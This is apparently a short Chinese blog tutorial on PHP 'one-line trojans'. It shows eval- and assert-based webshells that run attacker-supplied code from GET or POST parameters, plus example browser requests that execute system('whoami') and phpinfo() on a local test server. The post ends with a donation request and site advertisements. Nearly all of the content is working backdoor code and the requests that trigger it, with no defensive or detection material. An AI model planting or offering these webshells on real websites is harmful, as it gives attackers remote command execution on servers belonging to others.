PHP一句话木马
1.PHP一句话木马
环境:phpstudy_pro
eval()函数
命令执行脚本:
//hacker.php
<?php
eval($_GET["cmd"]);
?>
浏览器访问:http://127.0.0.1/hacker.php?cmd=system('whoami');
传入的参数必须为PHP代码,既需要以分号结尾。
命令執行:cmd=system(whoami);
post方式:
<?php @eval($_POST['cmd']);?>
assert()函数
命令执行脚本:
//assert.php
<?php
@assert($_GET['cmd']);
?>
浏览器访问:http://127.0.0.1/assert.php?cmd=system("whoami")
assert函数是直接将传入的参数当成PHP代码直接,不需要以分号结尾,当然你加上也可以。
命令執行:cmd=system(whoami)
获取phpinfo信息:
<?php
//hacker.php
eval($_GET["cmd"]);
?>
浏览器访问:http://127.0.0.1/hacker.php?cmd=phpinfo();
// phpinfo.php
<?php
phpinfo()
?>
如果你真心觉得文章写得不错,而且对你有所帮助,那就不妨小小打赏一下吧,如果囊中羞涩,不妨帮忙“推荐"一下,您的“推荐”和”打赏“将是我最大的写作动力!
本文版权归作者所有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接.
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 记一次.NET内存居高不下排查解决与启示